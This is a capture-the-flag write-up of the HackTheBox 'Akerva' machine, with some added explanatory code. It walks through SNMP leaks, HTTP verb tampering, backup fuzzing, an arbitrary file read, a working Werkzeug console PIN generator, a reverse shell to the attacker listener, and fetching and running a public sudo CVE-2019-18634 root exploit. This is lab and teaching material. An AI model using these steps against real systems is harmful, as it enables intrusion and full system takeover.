AKERVA HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-25 22:34 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating Ping Scan at 22:34
Scanning 10.13.37.11 [4 ports]
Completed Ping Scan at 22:34, 0.43s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:34
Scanning akerva.htb (10.13.37.11) [1000 ports]
Discovered open port 22/tcp on 10.13.37.11
Discovered open port 80/tcp on 10.13.37.11
Discovered open port 5000/tcp on 10.13.37.11
Completed SYN Stealth Scan at 22:34, 5.96s elapsed (1000 total ports)
Initiating Service scan at 22:34
Scanning 3 services on akerva.htb (10.13.37.11)
Completed Service scan at 22:34, 25.70s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against akerva.htb (10.13.37.11)
Retrying OS detection (try #2) against akerva.htb (10.13.37.11)
Initiating Traceroute at 22:34
Completed Traceroute at 22:34, 0.30s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 22:34
Completed Parallel DNS resolution of 2 hosts. at 22:34, 0.19s elapsed
NSE: Script scanning 10.13.37.11.
Initiating NSE at 22:34
Completed NSE at 22:35, 11.72s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 1.69s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for akerva.htb (10.13.37.11)
Host is up (0.27s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 0d:e4:41:fd:9f:a9:07:4d:25:b4:bd:5d:26:cc:4f:da (RSA)
|   256 f7:65:51:e0:39:37:2c:81:7f:b5:55:bd:63:9c:82:b5 (ECDSA)
|_  256 28:61:d3:5a:b9:39:f2:5b:d7:10:5a:67:ee:81:a8:5e (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://10.13.37.11/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
5000/tcp open  http    Werkzeug httpd 0.16.0 (Python 2.7.15+)
| http-auth: 
| HTTP/1.0 401 UNAUTHORIZED\x0D
|_  Basic realm=Authentication Required
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%), Android 4.2.2 (Linux 3.4) (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 36.817 days (since Fri Jun 19 02:58:34 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   299.62 ms 10.13.14.1
2   299.73 ms akerva.htb (10.13.37.11)

NSE: Script Post-scanning.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.05 seconds
           Raw packets sent: 1240 (57.962KB) | Rcvd: 1062 (45.946KB)

PORT 80

SOURCE CODE

Port 80 serves a WordPress site (the response headers further down show X-Redirect-By: WordPress). Viewing the page source reveals a forgotten HTML comment, and with it the 1st flag:

AKERVA{Ikn0w_F0rgoTTEN#CoMmeNts}

The TCP scan only shows three ports, so we also look at UDP: port 161 (SNMP) is open. We enumerate it with snmp-check, using the default community string public and SNMP version 2c:

snmp-check 10.13.37.11 -c public -v 2c

Redirect the output to a file, because snmp-check dumps a lot of data (system details, interfaces, routes and the complete process table). The interesting part is the process table, where the full command line of every running process is visible:

OUTPUT:

<----->


  1233                  runnable              cron                  /usr/sbin/CRON        -f                  
  1234                  runnable              cron                  /usr/sbin/CRON        -f                  
  1235                  runnable              sh                    /bin/sh               -c /opt/check_backup.sh
  1236                  runnable              sh                    /bin/sh               -c /opt/check_devSite.sh
  1237                  runnable              check_backup.sh       /bin/bash             /opt/check_backup.sh
  1238                  runnable              check_devSite.s       /bin/bash             /opt/check_devSite.sh
  1241                  runnable              backup_every_17       /bin/bash             /var/www/html/scripts/backup_every_17minutes.sh AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}
  1242                  runnable              space_dev.py          /usr/bin/python       /var/www/html/dev/space_dev.py
  1247                  runnable              python                /usr/bin/python       /var/www/html/dev/space_dev.py

<----->

The backup script's command line carries the 2nd flag. This is the SNMP misconfiguration the flag name refers to: the process table (hrSWRunTable) exposes the arguments of every running process to anyone who knows the community string, so a secret passed on a command line leaks to the whole network.

AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}

The same listing tells us the web root contains /scripts/backup_every_17minutes.sh and a dev/ directory, and that backups are being written somewhere. Requesting the script with a plain GET is denied, as are the other files we try in that directory, so we send the request through Burp and change the request method.

Instead of a GET we send a POST to the same URL. This is HTTP verb tampering: the access control only applies to the method it was written for (a typical cause is an Apache <Limit GET> block around the deny rule), so any other method reaches the file.
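To make the bypass concrete, here is an added example (my code, not part of the original write-up and not taken from the box's Apache configuration). It models the assumed misconfiguration, a deny rule scoped with <Limit GET>, as a small local HTTP server, models the fixed rule next to it, and probes both with the verbs a pentester would try. The path is the one from the SNMP listing; the script body served is a constructed stand-in.

```python
import http.client
import http.server
import threading

# Path seen in the SNMP process table; the body served is a constructed stand-in.
PROTECTED = "/scripts/backup_every_17minutes.sh"
SCRIPT_BODY = b"#!/bin/bash\n# constructed stand-in for the real backup script\n"


class LimitGetHandler(http.server.BaseHTTPRequestHandler):
    """Models the assumed vulnerable Apache configuration:

        <Directory /var/www/html/scripts>
            <Limit GET>
                Require all denied
            </Limit>
        </Directory>

    <Limit> scopes the rule to the listed verbs only, so POST, HEAD, PUT, ...
    are never checked and fall straight through to the file."""

    def is_denied(self):
        return self.command == "GET"

    def _handle(self):
        if self.path != PROTECTED:
            self.send_error(404)
            return
        if self.is_denied():
            self.send_error(403)
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/x-shellscript")
        self.send_header("Content-Length", str(len(SCRIPT_BODY)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(SCRIPT_BODY)

    do_GET = do_HEAD = do_POST = do_OPTIONS = do_PUT = _handle

    def log_message(self, *args):  # keep the demo quiet
        pass


class HardenedHandler(LimitGetHandler):
    """Models the fix: the same 'Require all denied' with the <Limit> wrapper
    removed (or a <LimitExcept> listing the verbs you DO allow), so the rule
    applies to every method."""

    def is_denied(self):
        return True


def probe_verbs(host, port, path, verbs=("GET", "HEAD", "POST", "OPTIONS", "PUT")):
    """Request one path with each verb and return {verb: status}.
    A 403 on GET next to a 200 on any other verb is the verb-tampering signal."""
    results = {}
    for verb in verbs:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request(verb, path)
        resp = conn.getresponse()
        resp.read()
        results[verb] = resp.status
        conn.close()
    return results


def bypass_verbs(results):
    """Verbs that reach the resource although GET is blocked."""
    if results.get("GET") != 403:
        return []
    return sorted(v for v, status in results.items() if v != "GET" and status == 200)


def probe_local(handler_cls):
    """Spin the handler up on a random loopback port, probe it, tear it down."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        host, port = srv.server_address
        return probe_verbs(host, port, PROTECTED)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for cls in (LimitGetHandler, HardenedHandler):
        r = probe_local(cls)
        print(cls.__name__, r, "bypass via:", bypass_verbs(r))
```

Against a real target, point probe_verbs at the host and path instead of the local server; any verb in bypass_verbs is the one to replay in Burp. Note that HEAD returning 200 is also a leak even without a body: it confirms the file exists and how large it is.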

The POST returns the script, and with it the 3rd flag:

AKERVA{IKNoW###VeRbTamper!nG_==}

The script as returned by the POST request:

#!/bin/bash
#
# This script performs backups of production and development websites.
# Backups are done every 17 minutes.
#
# AKERVA{IKNoW###VeRbTamper!nG_==}
#

SAVE_DIR=/var/www/html/backups

while true
do
	ARCHIVE_NAME=backup_$(date +%Y%m%d%H%M%S)
	echo "Erasing old backups..."
	rm -rf $SAVE_DIR/*

	echo "Backuping..."
	zip -r $SAVE_DIR/$ARCHIVE_NAME /var/www/html/*

	echo "Done..."
	sleep 1020
done

The script runs forever: every 17 minutes (sleep 1020) it wipes /var/www/html/backups and zips the whole web root into that directory as backup_YYYYmmddHHMMSS.zip, the timestamp being the server's clock when the iteration started:

backup_[year month day hour minute second]

So to guess the archive name we need the server's time, not ours. curl with --head shows it in the Date response header (and confirms the site is WordPress):

┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #curl http://akerva.htb --head
HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Jul 2020 18:00:23 GMT
Server: Apache/2.4.29 (Ubuntu)
X-Pingback: http://10.13.37.11/xmlrpc.php
X-Redirect-By: WordPress
Location: http://10.13.37.11/
Content-Type: text/html; charset=UTF-8

That fixes the date and the hour, so the current archive is named backup_2020072518XXXX.zip:

25 Jul 2020 18:00:23 >> backup_2020072518XXXX

The XXXX are the unknown minute and second. We fuzz them with a 4-digit wordlist. Two caveats: only 0000-5959 are valid clock values, so a full 0000-9999 list wastes 6400 requests, and if the next backup runs after the hour changes, the fixed 2020072518 prefix has to be updated (the archive is replaced every 17 minutes, so run curl again right before fuzzing).
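Rather than fuzzing a fixed prefix plus four digits, the name can be derived directly from the Date header. The following is an added example (my code, not from the write-up): it parses the header, walks back one second at a time over the 17-minute window the script sleeps for, and produces the candidate names newest first, crossing hour and day boundaries correctly. It assumes, as the write-up's hit confirms for this box, that the server's date(1) runs on UTC like the header; on another host you would add the local offset.

```python
from datetime import timedelta
from email.utils import parsedate_to_datetime

# From backup_every_17minutes.sh: sleep 1020 between runs, names from date +%Y%m%d%H%M%S
BACKUP_INTERVAL = timedelta(seconds=1020)


def server_time(date_header):
    """Parse the HTTP Date header (RFC 7231 IMF-fixdate, always GMT) into a datetime.
    Assumption (true for this box): the server clock the script's date call uses
    is UTC as well; otherwise apply the host's local offset to the result."""
    return parsedate_to_datetime(date_header)


def backup_name(ts):
    return "backup_" + ts.strftime("%Y%m%d%H%M%S") + ".zip"


def candidate_names(date_header, interval=BACKUP_INTERVAL, slack=timedelta(seconds=5)):
    """Every name the live archive can currently have.

    The script deletes the previous archive and writes a new one once per
    `interval`, so the one on disk was created at some second within the last
    `interval`. Walk backwards one second at a time from 'now', newest first,
    so the fuzzer hits the likeliest names early. `slack` covers drift between
    our request and the server's own date call. Because whole datetimes are
    decremented, the list rolls over hour and day boundaries on its own,
    unlike a fixed YYYYMMDDHH prefix with four fuzzed digits."""
    now = server_time(date_header)
    names = []
    t = now + slack
    stop = now - interval - slack
    while t >= stop:
        names.append(backup_name(t))
        t -= timedelta(seconds=1)
    return names


def mmss_wordlist():
    """The 4-digit approach from the write-up, restricted to real clock values:
    minutes and seconds both run 00-59, so 3600 candidates instead of 10000."""
    return ["%02d%02d" % (m, s) for m in range(60) for s in range(60)]


if __name__ == "__main__":
    # Date header captured with `curl --head http://akerva.htb` in the write-up.
    names = candidate_names("Sat, 25 Jul 2020 18:00:23 GMT")
    with open("backup_names.txt", "w") as f:
        f.write("\n".join(names) + "\n")
    print(len(names), "candidates, newest", names[0], "oldest", names[-1])
    # then: wfuzz -u http://akerva.htb/backups/FUZZ -w backup_names.txt --hc 404
```

The list is about a thousand names instead of ten thousand, and it is ordered so that a single run usually finds the archive within the first few hundred requests. Fetch the Date header immediately before generating it: by the time the write-up's fuzzing ran, a newer archive (181629) had already replaced the one that existed at 18:00:23.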

COMMAND TO DO THAT:

┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #wfuzz -u http://akerva.htb/backups/backup_2020072518FUZZ.zip -w 4digit.txt --hc 404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://akerva.htb/backups/backup_2020072518FUZZ.zip
Total requests: 10000

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                
===================================================================

000001630:   200        82522    810989   20937179    "1629"                                                                                                 
                        L         W       Ch                                                                                                                 
000008014:   404        9 L      31 W     272 Ch      "8013"                      

Only one name returns 200, so we download that archive:

wget http://akerva.htb/backups/backup_20200725181629.zip

ENUMERATING VAR FOLDER

Unzipping gives the whole web root under var/www/html. In the dev/ directory is space_dev.py, the Flask application the SNMP process table showed running, i.e. the service on port 5000:

┌─[root@liquid]─[~/Desktop/HTB/akervaC/var/www/html/dev]
└──╼ #cat space_dev.py 
#!/usr/bin/python

from flask import Flask, request
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash

app = Flask(__name__)
auth = HTTPBasicAuth()

users = {
        "aas": generate_password_hash("AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}")
        }

@auth.verify_password
def verify_password(username, password):
    if username in users:
        return check_password_hash(users.get(username), password)
    return False

@app.route('/')
@auth.login_required
def hello_world():
    return 'Hello, World!'

# TODO
@app.route('/download')
@auth.login_required
def download():
    return downloaded_file

@app.route("/file")
@auth.login_required
def file():
	filename = request.args.get('filename')
	try:
		with open(filename, 'r') as f:
			return f.read()
	except:
		return 'error'

if __name__ == '__main__':
    print(app)
    print(getattr(app, '__name__', getattr(app.__class__, '__name__')))
    app.run(host='0.0.0.0', port='5000', debug = True)

That gives the 4th flag:

AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}

The script hashes the password at startup with generate_password_hash, but the plaintext is right there in the source: the flag is the password of user aas. Logging in on port 5000 with aas and the flag (HTTP Basic authentication) returns the Hello, World! page.

The /file route is the interesting part: it opens whatever path arrives in the filename parameter and returns the contents, with no validation at all. That is a local file inclusion, or more precisely an arbitrary file read, as the user the Flask app runs as.

Reading /home/aas/flag.txt through it gives the 5th flag:

AKERVA{IKNOW#LFi_@_}

The obvious next target, /home/aas/.ssh/id_rsa, does not exist, so the file read alone does not get us a shell.
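The following is an added example (mine, not the box's code) that puts the /file route's pattern next to a hardened version. It uses only the standard library so it runs without Flask: the vulnerable function is the one-liner from space_dev.py, the hardened one confines reads to a single directory and resolves the path before checking containment, which also defeats a planted symlink. The directory layout it builds is constructed; secret.txt stands in for /home/aas/flag.txt.

```python
import os
import tempfile


class UnsafePath(ValueError):
    """Raised when a client-supplied path would leave the allowed directory."""


def read_file_vulnerable(filename):
    """The pattern in space_dev.py's /file route: open() whatever the client sent.
    Absolute paths, ../ sequences and symlinks all work, so any file readable by
    the app user (flag.txt, /etc/machine-id, /sys/class/net/*/address) leaks."""
    with open(filename, "r") as f:
        return f.read()


def resolve_under(base_dir, user_path):
    """Map a client-supplied relative path onto base_dir, or raise UnsafePath.

    realpath() normalises '..' and follows symlinks *before* the containment
    check, so neither 'docs/../../secret' nor a symlink planted inside base_dir
    can point outside it. Absolute paths are rejected outright rather than
    silently re-rooted."""
    if os.path.isabs(user_path) or not user_path:
        raise UnsafePath("absolute or empty path: %r" % user_path)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise UnsafePath("path escapes %s: %r" % (base_dir, user_path))
    return target


def read_file_hardened(base_dir, filename):
    """What the /file route should do: confine reads to one directory."""
    target = resolve_under(base_dir, filename)
    if not os.path.isfile(target):
        raise UnsafePath("not a regular file: %r" % filename)
    with open(target, "r") as f:
        return f.read()


def demo():
    """Constructed layout: <tmp>/docs is the only directory the route may serve,
    <tmp>/secret.txt stands in for /home/aas/flag.txt. Returns what each version
    let through."""
    top = tempfile.mkdtemp()
    docs = os.path.join(top, "docs")
    os.mkdir(docs)
    with open(os.path.join(docs, "notes.txt"), "w") as f:
        f.write("public notes\n")
    with open(os.path.join(top, "secret.txt"), "w") as f:
        f.write("constructed secret\n")
    # a symlink inside the allowed directory that points outside it
    os.symlink(os.path.join(top, "secret.txt"), os.path.join(docs, "link.txt"))

    out = {"vuln_traversal": read_file_vulnerable(os.path.join(docs, "..", "secret.txt")),
           "hard_legit": read_file_hardened(docs, "notes.txt")}
    for label, path in (("hard_traversal", "../secret.txt"),
                        ("hard_absolute", os.path.join(top, "secret.txt")),
                        ("hard_symlink", "link.txt")):
        try:
            out[label] = read_file_hardened(docs, path)
        except UnsafePath:
            out[label] = "blocked"
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-15s %r" % (k, v))
```

The containment check belongs on the resolved path, not on the string the client sent: filtering "../" out of the input is easily bypassed (encoded slashes, "....//") and does nothing about symlinks.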

Fuzzing port 5000 also turns up /console. That is the Werkzeug debugger console, enabled because the app runs with debug = True (last line of space_dev.py), and it is protected by a PIN.

The PIN is not random: Werkzeug derives it deterministically from a few values on the host, so anyone who can read those values can compute it. The procedure is described here:

https://www.daehee.com/werkzeug-console-pin-exploit/

The script from that post needs the username the app runs as, the MAC address of the network interface and the machine-id. The last two are exactly what the LFI gives us: /sys/class/net/ens33/address and /etc/machine-id.

Werkzeug feeds in uuid.getnode(), which is the MAC as a decimal integer, so convert the hex from the address file with Python:

>>> print(0x5056b96d18)
345052376344

The complete script, with the values for this box filled in, looks like this:

import hashlib
from itertools import chain

# Values gathered from the target; the comments say where each one comes from.
probably_public_bits = [
    'aas',                                                  # username the app runs as (getpass.getuser())
    'flask.app',                                            # modname
    'Flask',                                                # getattr(app, '__name__', getattr(app.__class__, '__name__')), as space_dev.py prints it
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc'  # getattr(mod, '__file__', None); .pyc because the app runs under Python 2.7
]

private_bits = [
    '345052376344',                      # str(uuid.getnode()): MAC from /sys/class/net/ens33/address as a decimal integer
    '258f132cd7e647caaf5510e3aca997c1'   # get_machine_id(): contents of /etc/machine-id
]

# Werkzeug 0.16 hashes the bits with MD5 (later releases changed the algorithm
# and the machine-id inputs, so this reproduction is specific to the version
# seen in the nmap scan).
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

# The PIN is the first nine digits of the digest after a second salt...
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

# ...split into equal groups (nine digits give 3-3-3).
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

Running the script prints the PIN, which unlocks the console.

The console is a Python REPL running inside the application process, so we launch a Python reverse shell from it and catch it with a listener:

┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.14.10] from (UNKNOWN) [10.13.37.11] 57478
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(aas) gid=1000(aas) groups=1000(aas),24(cdrom),30(dip),46(plugdev)
$ python -c 'import pty;pty.spawn("/bin/bash")'
aas@Leakage:~$ ls
ls
flag.txt

A hidden file in the same directory holds the next flag:

aas@Leakage:~$ cat .hiddenflag.txt
cat .hiddenflag.txt
AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}

Here we go with our 6th flag:

AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}

Further enumeration as aas turns up no obvious privilege escalation path, but sudo prints something unusual when we try it, so we check its version:

aas@Leakage:/opt$ sudo --version
sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

Searching for that version turns up CVE-2019-18634, a stack-based buffer overflow in sudo's pwfeedback handling, along with a public exploit:

https://github.com/saleemrashid/sudo-cve-2019-18634/

The bug is only reachable when the pwfeedback option is enabled in sudoers (it echoes an asterisk for every character typed at the password prompt), which is the case on this box. Clone the repo, compile it on our machine, serve the resulting binary over HTTP and fetch it on the target:

aas@Leakage:/tmp$ wget http://10.13.14.10/exploit
wget http://10.13.14.10/exploit
--2020-07-25 16:40:37--  http://10.13.14.10/exploit
Connecting to 10.13.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17480 (17K) [application/octet-stream]
Saving to: ‘exploit’

exploit             100%[===================>]  17.07K  26.8KB/s    in 0.6s    

2020-07-25 16:40:39 (26.8 KB/s) - ‘exploit’ saved [17480/17480]

aas@Leakage:/tmp$ ls
ls
exploit
systemd-private-d387e08ebced48278578cfff30488f9b-apache2.service-FUVgpA
systemd-private-d387e08ebced48278578cfff30488f9b-systemd-resolved.service-7xDcps
systemd-private-d387e08ebced48278578cfff30488f9b-systemd-timesyncd.service-p8EwEw
vmware-root_625-4021587817
aas@Leakage:/tmp$ chmod +x exploit
chmod +x exploit
aas@Leakage:/tmp$ ./exploit
./exploit
[sudo] password for aas: 
There's a lot of it about, you know.
# id
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(aas)
# cd /root
ls
cd /root
# ls
flag.txt  secured_note.md
# cat flag.txt
cat flag.txt
AKERVA{IkNow_Sud0_sUckS!}

Here we go with our 7th flag

AKERVA{IkNow_Sud0_sUckS!}

/root/secured_note.md contains a base64 string. Decoding it gives the ciphertext below, which a cipher identifier (the Python hash/cipher identifier tool we use) classifies as Vigenère.

Pasting it straight into the dcode.fr Vigenère solver only produces random letters, so first look at which letters actually occur in the string:

GOAHGHEEGSAEEHACEGULREPEEECEOKMKERFSESFRLKERUKTSVPMSSNHSKRFFAGIAPVETCNMDLVFHDAOGFLAFGSKEULMVOOWWCAHCRFVVNVHVCMSYELSPMIHHMODAUKHE

Five letters never appear:

b, j, q, x, z

So the cipher works over the remaining 21-letter alphabet rather than the usual 26, which is why the default solver settings fail. Two things are needed: the reduced set of letters as the solver's alphabet, and a piece of known plaintext.

The string that must be present in the flag is AKERVA.

With the custom alphabet and that crib the solver recovers the message.
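To show why the alphabet matters and how the AKERVA crib pins down the key, here is an added example (my code, not part of the write-up; I do not know the box's actual key, so the key and plaintext below are constructed). It implements Vigenère over an arbitrary alphabet, decrypts the constructed sample with the 21-letter alphabet, shows that the correct key with the standard 26-letter alphabet gives exactly the random letters the write-up describes, and recovers the key from the known AKERVA{ prefix.

```python
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# The write-up's observation: b, j, q, x and z never occur in the ciphertext,
# so the cipher runs over the remaining 21 letters.
REDUCED = "".join(c for c in STANDARD if c not in "BJQXZ")

# Constructed sample: key and plaintext are mine, not the box's.
SAMPLE_KEY = "SHIELD"
SAMPLE_PT = "AKERVA{CONSTRUCTEDSAMPLEFLAG}"


def vigenere(text, key, alphabet, decrypt=False):
    """Vigenère over an arbitrary alphabet. Characters outside the alphabet
    (braces, digits) are passed through unchanged and do not consume key."""
    idx = {c: i for i, c in enumerate(alphabet)}
    n = len(alphabet)
    out, k = [], 0
    for ch in text:
        if ch not in idx:
            out.append(ch)
            continue
        shift = idx[key[k % len(key)]]
        if decrypt:
            shift = -shift
        out.append(alphabet[(idx[ch] + shift) % n])
        k += 1
    return "".join(out)


def recover_keystream(ciphertext, crib, alphabet):
    """Known-plaintext attack for a crib at the start of the message: each key
    letter is ciphertext minus plaintext (mod alphabet size). Characters outside
    the alphabet are skipped, mirroring vigenere()."""
    idx = {c: i for i, c in enumerate(alphabet)}
    n = len(alphabet)
    stream = []
    for p, c in zip(crib, ciphertext):
        if p not in idx:
            continue
        stream.append(alphabet[(idx[c] - idx[p]) % n])
    return "".join(stream)


def shortest_period(stream):
    """Collapse a recovered keystream to its repeating unit ('SHIELDSHI' -> 'SHIELD').
    If the crib is shorter than the key only a prefix is known; it is returned as-is."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i % p] for i in range(len(stream))):
            return stream[:p]
    return stream


def demo():
    ct = vigenere(SAMPLE_PT, SAMPLE_KEY, REDUCED)
    return {
        "ciphertext": ct,
        "roundtrip": vigenere(ct, SAMPLE_KEY, REDUCED, decrypt=True),
        # right key, wrong (26-letter) alphabet: the "random letters" the
        # write-up saw, including letters that cannot occur in the real alphabet
        "wrong_alphabet": vigenere(ct, SAMPLE_KEY, STANDARD, decrypt=True),
        # crib = the AKERVA{ prefix every flag shares, extended a little
        "key_from_crib": shortest_period(recover_keystream(ct, "AKERVA{CONSTRUCT", REDUCED)),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-15s %s" % (k, v))
```

With only the six letters of AKERVA as crib, recover_keystream returns the first six key characters; if the key is longer than that, the rest has to come from the solver's statistics or from extending the crib, which is what a solver that accepts both a custom alphabet and a known-plaintext fragment does for you.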

Here we go with our 8th flag

AKERVA{IKNOOOWVIGEEENERRRE}

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
